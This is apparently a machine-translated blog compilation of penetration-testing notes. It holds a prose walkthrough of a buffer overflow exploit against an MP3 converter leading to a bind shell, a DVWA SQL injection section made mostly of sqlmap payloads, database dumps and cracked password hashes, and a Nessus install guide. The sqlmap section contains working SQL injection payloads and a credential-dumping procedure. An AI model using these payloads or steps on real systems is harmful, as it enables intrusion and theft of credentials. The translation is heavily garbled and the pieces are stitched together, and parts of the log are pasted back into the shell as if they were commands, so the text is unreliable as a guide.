BUFFER OVERFLOW MINI STREAM MP3

that first we must make a code of fuzzer :

after making fuzzer we which must do that is save is name of fuzzer, if menyimpan me of name of fuzzer by the name of moapato.py.

My second step OllyDbg running application. and open the application RM2MP3 Converter.exe. in the application fuzzer on filename is "salim.smi". the file will extarct in python folder, and must move in windows xp.

and  click  open, hence its result will seen like hereunder.

after mentioned step  us start to run its mini stream.

after opening is mini our stream return to backtrack to make result of smi by using root, follow the example of like picture hereunder.

after making in root, hence its result will like this.

after that drag the salim.smi in mini stream converter.

hence its result will like this.

in address ESP we get chracter AAAAAA as much 25000, and EIP 41414141

like picture hereunder.

skrip which we earn mentioned we input can to python, see the example.

step hereinafter its us , if our success step into windows to run Ollydbg, after running Ollydbg hence will seen its result like picture hereunder.

and now try the pattern_offset. i'm have get the EIP 36695735 and ESP i8Wi9Wj0.

after us get EIP address and ESP we can make script care of EIP we which have find.

and we can see result of compile Ollydbg picture hereunder, in this case to check there real correct position from existing EIP there.

afterwards we try script following.

after compile hence its result like this.

and from picture above we can look for JMP ESP, usually JMP ESP searched in SHELL32, but [do] not always JMP ESP in SHELL32 hence from that we use command to searching it one by one.

after us get JMP ESP hence its result will seen like hereunder.

first active us use root, like picture hereunder.

if have is active, open last browser typing browser 127.0.0.1:55555 hence will go out its result like picture hereunder.

afterwards select shell bind windows searching and payload hence will go out its result like this.

after us chosen shell bind windows we have to fill what there  in the example shell bind windows see picture.

after in direct content just click Generate Payload hence will seen result of like picture following.

make new script.

extract the python file name="salim.smi". and run ollydbg and running converter.

converter loading, and us return to root for the chek of she have IP or not.

after getting our IP to root to activating talnet.

we dir input.

Success, likely will be mad

Memori Register

Memory Register Utilized for the save of data and instruction which small deposit which have high-speedly ( 5 until 10kali speed especial memory), used for the save of data instruksi and which processing by CPU ( other instruction which awaiting innings kept playing memory) Register memory divided to become 2 , that is Instruction Register ( IR) Or Program Register which instruction save used to which processing and Program Counter ( PC) Or Control Counter / counter instruction is register used for the save of address ( location address) from playing containing memory instruction which processing

Register related to data which processing to be to be referred General Purpose Register owning usefulness as Operand Register ( to accomodate operand or data which being processed) Accumulator and as ( for the save of result of from done and logika aritmatika operation PESTLE). In addition from Register , CPU beberapa16 use an Cache Memory / Memory scratch-pad / high- buffer speed / Buffer Memory with a purpose to activity from CPU more efficient and can lessen time which castaway.

Buffer Overflow

Buffer : repository

Overflow : excess

Become its conclusion

Buverflow buffer is repository whereas which excess

But there also in other term.

Overflow Buffer is one of method used by people to exploit a computer system owning weakness one of application used by the system. A application earn buffer-overflow because it is true the application not have good data control and usually not realizing by the the program maker.

DVWA SQL injection Hard Level

Defines:

      SQL injection

      SQL injection is a code injection technique that exploits a security vulnerability in a         website's software.

Blind SQL injection

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

Example :

SQL MAP

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=2' AND (SELECT 687 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,111,114,58),(SELECT (CASE WHEN (687=687) THEN 1 ELSE 0 END)),CHAR(58,112,116,98,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XyFv'='XyFv&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=2' UNION ALL SELECT CONCAT(CHAR(58,112,111,114,58),IFNULL(CAST(CHAR(88,111,67,99,88,86,76,121,85,120) AS CHAR),CHAR(32)),CHAR(58,112,116,98,58)), NULL# AND 'LtQG'='LtQG&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=2' AND SLEEP(5) AND 'wjcm'='wjcm&Submit=Submit

---

[21:59:36] [INFO] manual usage of GET payloads requires url encoding

[21:59:36] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[21:59:36] [INFO] fetching database names

[21:59:36] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, fbip, mysql

available databases [4]:

[*] dvwa

[*] fbip

[*] information_schema

[*] mysql

[21:59:36] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 21:59:36

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie=" security=low; PHPSESSID=8elfeon7glue479503e24on4t2" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:02:20

[22:02:20] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[22:02:20] [INFO] resuming injection data from session file

[22:02:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[22:02:20] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=2' AND (SELECT 687 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,111,114,58),(SELECT (CASE WHEN (687=687) THEN 1 ELSE 0 END)),CHAR(58,112,116,98,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XyFv'='XyFv&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=2' UNION ALL SELECT CONCAT(CHAR(58,112,111,114,58),IFNULL(CAST(CHAR(88,111,67,99,88,86,76,121,85,120) AS CHAR),CHAR(32)),CHAR(58,112,116,98,58)), NULL# AND 'LtQG'='LtQG&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=2' AND SLEEP(5) AND 'wjcm'='wjcm&Submit=Submit

---

[22:02:20] [INFO] manual usage of GET payloads requires url encoding

[22:02:20] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[22:02:20] [INFO] fetching tables for database: dvwa

Database: dvwa

[2 tables]

+-----------+

| guestbook |

| users |

+-----------+

[22:02:20] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:02:20

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie=" security=low; PHPSESSID=8elfeon7glue479503e24on4t2" -D dvwa -t users --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:03:15

[22:03:16] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[22:03:16] [INFO] resuming injection data from session file

[22:03:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[22:03:16] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=2' AND (SELECT 687 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,111,114,58),(SELECT (CASE WHEN (687=687) THEN 1 ELSE 0 END)),CHAR(58,112,116,98,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XyFv'='XyFv&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=2' UNION ALL SELECT CONCAT(CHAR(58,112,111,114,58),IFNULL(CAST(CHAR(88,111,67,99,88,86,76,121,85,120) AS CHAR),CHAR(32)),CHAR(58,112,116,98,58)), NULL# AND 'LtQG'='LtQG&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=2' AND SLEEP(5) AND 'wjcm'='wjcm&Submit=Submit

---

[22:03:16] [INFO] manual usage of GET payloads requires url encoding

[22:03:16] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[22:03:16] [INFO] fetching tables for database: dvwa

[22:03:16] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users

[22:03:16] [INFO] fetching columns for table 'guestbook' on database 'dvwa'

[22:03:16] [INFO] fetching entries for table 'guestbook' on database 'dvwa'

Database: dvwa

Table: guestbook

[1 entry]

+-------------------------+------------+------+

| comment | comment_id | name |

+-------------------------+------------+------+

| This is a test comment. | 1 | test |

+-------------------------+------------+------+

[22:03:16] [INFO] Table 'dvwa.guestbook' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/guestbook.csv'

[22:03:16] [INFO] fetching columns for table 'users' on database 'dvwa'

[22:03:16] [INFO] fetching entries for table 'users' on database 'dvwa'

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y

[22:03:25] [INFO] using hash method: 'md5_generic_passwd'

what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]

[22:03:31] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'

do you want to use common password suffixes? (slow!) [y/N] y

[22:03:34] [INFO] starting dictionary attack (md5_generic_passwd)

[22:03:34] [INFO] found: 'abc123' for user: 'gordonb'

[22:03:35] [INFO] found: 'charley' for user: '1337'

[22:03:35] [INFO] found: 'letmein' for user: 'pablo'

[22:03:36] [INFO] found: 'password' for user: 'admin'

Database: dvwa

Table: users

[5 entries]

+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

| avatar | first_name | last_name | password | user | user_id |

+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

| http://127.0.0.1/dvwa/hackable/users/pablo.jpg | Pablo | Picasso | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | pablo | 4 |

| http://127.0.0.1/dvwa/hackable/users/admin.jpg | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | 1 |

| http://127.0.0.1/dvwa/hackable/users/1337.jpg | Hack | Me | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | 1337 | 3 |

| http://127.0.0.1/dvwa/hackable/users/smithy.jpg | Bob | Smith | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | smithy | 5 |

| http://127.0.0.1/dvwa/hackable/users/gordonb.jpg | Gordon | Brown | e99a18c428cb38d5f260853678922e03 (abc123) | gordonb | 2 |

+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

[22:04:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'

[22:04:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:04:30

root@bt:/pentest/database/sqlmap# root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="Cookie: security=low; PHPSESSID=8elfeon7glue479503e24on4t2" --dbs

bash: root@bt:/pentest/database/sqlmap#: No such file or directory

root@bt:/pentest/database/sqlmap#

root@bt:/pentest/database/sqlmap# sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

bash: syntax error near unexpected token `r4009'

root@bt:/pentest/database/sqlmap# http://sqlmap.sourceforge.net

bash: http://sqlmap.sourceforge.net: No such file or directory

root@bt:/pentest/database/sqlmap#

root@bt:/pentest/database/sqlmap# [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

>

> [*] starting at: 21:59:33

>

> [21:59:33] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

> [21:59:33] [INFO] resuming injection data from session file

> [21:59:33] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

> [21:59:33] [INFO] testing connection to the target url

> you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y

> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

> ---

> Place: GET

> Parameter: id

> Type: error-based

>

Nessus Installation on Linux

1.   For the installasi of, govern this.
#apt-get install nessus

hence will in root she of Installation alone.

2.     After finishing installasi process, follow message above first that is enhancing user for the Nessus of by order of as follows :

# /opt/nessus/sbin/nessus-adduser

Later will emerge appearance like hereunder :

Login : admin
Authentication (pass/cert) : [pass] pass
Login password :
Login password (again) :
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]: y
User rules
———-
nessusd has a rules system which allows you to restrict the hosts
that admin has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
Login : admin
Password : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added

3.    After enhancing user, if us force to run nessus service before meregistasi will emerge message like hereunder :

# /etc/init.d/nessusd start
$Starting Nessus : .
Missing plugins. Attempting a plugin update…
Your installation is missing plugins. Please register and try again.
To register, please visit http://www.nessus.org/register/

4.    Conduct registasi beforehand to link which have been given, wait we will be asked enamel address to be delivered a kind of code activation.

5.     Registration having taken steps, you'd get code activation to be able to update nessus service running and plugin.

6.    The following comand :

# /opt/nessus/bin/nessus-fetch –register xxxx-xxxx-xxx-xxxx-xxxx (Corresponding to given code activation.)

Later will emerge the following message :

Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org…
Your Nessus installation is now up-to-date.
If auto_update is set to ‘yes’ in nessusd.conf, Nessus will
update the plugins by itself.

7.     Having taken steps update plugin, hence we earn to run nessus service by order of as follows ::

# /etc/init.d/nessusd start
$Starting Nessus :



       8.      Hereinafter you remain to run nessus at will….

 To run nessus, please open your browser, later;then type "https://localhost:8834/" to activate n     using Nessus